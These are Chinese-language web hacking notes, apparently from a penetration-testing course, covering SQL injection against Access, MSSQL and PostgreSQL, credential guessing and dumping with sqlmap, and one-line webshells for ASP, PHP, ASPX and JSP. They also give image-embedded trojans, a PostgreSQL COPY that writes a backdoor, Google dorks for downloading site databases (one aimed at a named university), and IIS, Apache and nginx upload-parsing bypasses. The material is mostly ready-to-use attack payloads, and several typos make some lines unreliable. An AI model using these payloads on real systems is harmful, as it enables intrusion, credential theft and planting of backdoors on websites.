1.access数据库
数据库后缀名:*.mdb
打开数据库工具: 破障浏览器 辅臣数据库浏览器。
access注入》判断注入点》
‘报错 and 1=1返回正常 and 1=2返回错误 or 1=1正
常 or 1=2返回错误 an 1=23错误
返回错误存在注入漏洞
获取基本信息:
and 1=cast(version()as int) 获取数据库版本信息系统信息
and 1=cast(user||123 as int)获取当前用户名称
postgres用户相当于root用户权限。
上传漏洞--木马制作:
1.C32下做一句话:打开c32,把图片放入里面用16进制模式打开,写入一句话木马保存。。退出,
2.用cmd下做一句话:copy /b 1.jpg+1.asp 2.jpg win7下右击图片,在属性》详细信息》版权内插入一句话即可。
工作原理:黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:
<%execute request("value")%>
其中value是值,所以你可以更改自己的值,前面的request就是获取这个值。
当知道了数据库的url,就可以利用一张本地网友进行连接
得到webshell,不知道数据库也可以,只要知道<%eval request("value")%> 这个文件被插入到哪一个asp文件里面就可以了。
常见写法:
asp一句话木马:
<%eval request("heroes")%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx一句话:
<%@ Page Language="Jscript"%>
jsp一句话木马:
<%eval(Request.Item["value"])%>
创建xx表:然后插如木马
;create table xxx(w text not null);
;insert into xxx values($$<?php @eval($_PROT[起名
字]);?>$$);
向xxx表中插入一句话木马。
写文件
;copy xxx(w) to $
$/home/kasugai_tochi/pubic_html/script/Hydra.php;
然后用菜刀链接/script/Hydra.php
就生成了后门程序
判断数据库类型:
and exsits (select*from msysobjects)>0 access数据库
and exsits (select*from sysobjects)>0 sqlserver数据库
and (select*from admin
判断cms类型:
判断目标,脚本语言,操作系统,搭建平台,cms厂商,
使用工具:wvs, wwwscan ,站长工具,whatweb,
googlehack
data.asp(如果我没猜错这是他们的数据库)
爆库漏洞:
爆库常用方法:
inurl:/inc/conn.asp inurl:inc+conn.asp to parent
directory intext:
inurl:/inc/conn.asp
inurl:/inc+conn.asp
to parent directory
所有可以目录浏览的网页都有一些相同的地方,主要是下面
几个:to parent directory
last modified Description
转到父目录
爆库利用方法:
利用Google来搜索目录浏览的Google语法主要有:
intitle intext
inurl site
filetype等等
搜索与名后缀,常见的域名后缀有:
com net mil org info gov edu biz coop areo pro int arpa
列如下载复旦大学官网的数据库:
intext:to parent directory+intext:mdb
site:fudan.deu.cn//时间久了,补丁应该打上了。
爆库绕过防下载:
#sdfs.mdb 下载时把“#”改为%23sdfs.mdb
高级语法爆库:
inurl:./..admin../..add..
inurl:./..admin../..del..
inurl:/.asp<id=%<%<%
网站后台查找:
1.弱口令默认后台:
admin admin/login.asp manage login.asp等等常见后台
2.查看网页的链接:
一般来说,网站的主页有管理登录类似的东西,有些可能别
管理员删掉
3.查看网站图片的属性
4.查看网站使用的管理系统,从而确定后台
5.用工具查找:
wwwscan intellitamper 御剑等
6.robots.txt的帮助:
robot.txt文件告诉蜘蛛程序在服务器上什么样的文件可以
被查看
7.googlehacker:
inurl:xxx.com
site:xxx/com
site:xx.com后台管理
site: xx.com后台登录
site: xx.com管理员登录
8.查看网站使用的编辑器是否有默认后台,密码。
网站管理员密码猜解:
Hydra
PKAV HTTP Fuzzer
Discuz批量用户名密码暴力破解器
数据库后缀名:*.mdb 下载数据库把*改为%23就可以下载了
数据库注入
判断账户密码的长度:
and (select len(admin) from admin)=5 返回正常说明管
理员账户长度为5
and (select len(password) from admin)=5返回正常说明
猜解的密码长度为5
工具注入搜索框:
burpsuuite sqlmap
先使用burp抓包,保存到自建的文件夹1.txt里面
sqlmap -r 1.txt --tables 猜表名
sqlmap -r 1.txt ---columns -T "admin" 猜列名
sqlmap -r 1.txt --C "admin.password" -T "manger" --
dump -V 2 列内容
(ps:判断是什么脚本语言写的网页可以用index.php 或
者index.asp,index.jsp来判断。)
列如:http://www.hbdedu.cn/showartilcle_55.html
http://www.hbdedu.cn/showartilcle.asp?id=55
把后缀变调。
注入工具:
啊D,明小子,穿山甲,havji,
2.Mssql数据库(sql server2012):
端口:1433,可以改
初步判断是不是smmql数据库 and user>0
判断数据库系统:
and (select count(*)ftom sysobjects)>0 mssql数据库
and (select count(*)ftom msysobjects)>0 access数据库
判断注入的方法是一样的。
判断是否存在xxxx表 语句:
and (select count(*) from admin)<>0 返回正确即存在
admin表
and (select count(*) from adminuser)<>0 返回正确即存
在adminuser表
and (select count(*) from user)<>0 返回正确即存在
user表
判断是否存在xxx列 语句:
and (select count(user) from admin)<>0 返回正确即存
在user列
and (select count(admin) from admin)<>0 返回正确即存
在admin列 (user大多查看用户名)
and (select count(pass) from admin)<>0返回正确即存在
pass列
and (select count(password) from admin)<>0返回正确即
存在password列
and (select count(pwd) from admin)<>0返回正确即存在
pwd列
爆管理员账号密码长度:语句
and (select count(*) from admin where length(name)
>=5)=1
说明:length()函数用于求字符串的长度,此处猜测用户名
的长度和5比较,即猜测是否由5个字符组成。
and (select count(*) from admin where ascii(substr
(name,1,1))>=97).1
说明:substr()函数用于截取字符串,ascii()函数用
户获取字符的ascii码,此处的意思是截取name字段的第一
个字符,获取他的ascii码值,查询ascii表可知97为字符a
and (select count(*) from admin where length(pwd)>=8)=1
说明:返回正常即密码长度为8 此时可以判断密码应该为明文。
sql注入提交方式:
get:比较常见
post:主要提交方式适用于表单的提交用于登录框的注入,
列如www.cracer.com/admin.php。(管理员登录的界面)
使用工具:pangglin sqlmap
cookie:提交用于账号密码的cookie缓存,还可以通过
cookie注入来突破简单的防注入系统
上传解析漏洞:
主要说的是一些特殊文件被iis,apache,nginx在某种情况
下解释为脚本文件格式的漏洞。
is6.0解析利用方法两种:
目录解析,
/xx.asp/xx.jpg
在网站下建立文件夹的名字为.asp,.asa的文件夹,其中目
录内的任何扩展名的文件都被iis当做.asp文件来解析并执
行.
列如创建目录 xxxx.asp,那么/xxxx.asp/1.jpg 被当
做.asp文件来执行,假设黑客可以控制上传文件夹路径就可
以上传图片,改不改名都可以拿shell。
文件解析:
xxx.asp;.jpg
第二种,在iis6.0下,分号后面的不被解析,也就是说
xxx.asp;.jpg会被服务器看成是wooyun.asp还有iis6.0默认
的可执行文件除了asp还包含这险种;
/xxx.asa
/xxx.cee
/xxx.cdx
Apache解析漏洞:
Apache是从右到左开始判断解析,如果为不可识别解析,就往左判断,
比如xxx.php.owf,rar ."wof"和".rar"这两种后缀是Apache
不可识别解析,Apache就会把xxx.php.owf.rar解析成php.
如何判断是不是合法的后缀就是这个漏洞利用关键,测试是
可以尝试上传一个xxx.php.rar.jpg.png.....去测试是否合
法,
iis7.0/iis7.5/nginx <8.03畸形漏洞:
在默认Fast-cgi开启状态下,黑客上传一个名字为xxx.jpg
,内容为<?PHP fputs(fopen(‘shell.php‘,‘w‘),‘<?php
eval($_POST[cmd])?>‘);?> 的文件,然后访问
xxx.jpg/.php在这个目录下就会生成一句话木马 shell.php
www.xxx.com、logo.gif、*.php 触发漏洞(有漏洞会把前
面文件当做php执行)
nginx <8.03空子节代码执行漏洞:(影响版:0.5 0.6 0.7
<=0.765 0.8 <=0.8.37)
nginx在图片中嵌入php代码然后通过访问xxx.jpg%00.php来
执行其中的代码。
htaccess文件解析
如果在Apache中。htaccess可被执行,而且可以被上传,那
可以尝试在.htaccess中写入:
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch> 然后再上传shell.jpg的木马,这样
shell.jpg就可以解析为php文件。
文件上传漏洞方法:
服务器上传文件命名规则:
上传文件名和服务器命名一致,
上传文件名和服务器命名不一致(随机,时间日期命名等)
文件头欺骗漏洞:
在一句话木马前加入 GIF89a 然后将木马保存为图片格式,
列如:xxx.jpg xxx.gif 文件头欺骗可以用来绕过简单的waf
filepath漏洞:
可以用来突出自动命名规则xxx.gif
1.改变文件上传后的路径/a.asp/ 需要一定的创建权限,不
一定成功创建,成功创建后为 /a.asp/xxx.gif
2.直接改变文件,名称 /s.asp;. 修改后为
/a.asp;.xxx.gif
表单提交按钮:
slblog.xxxx.com/sleditor/upload.asp 写入表单 <input
type="subrmit" vale="提交" name="bb">
上传a.asp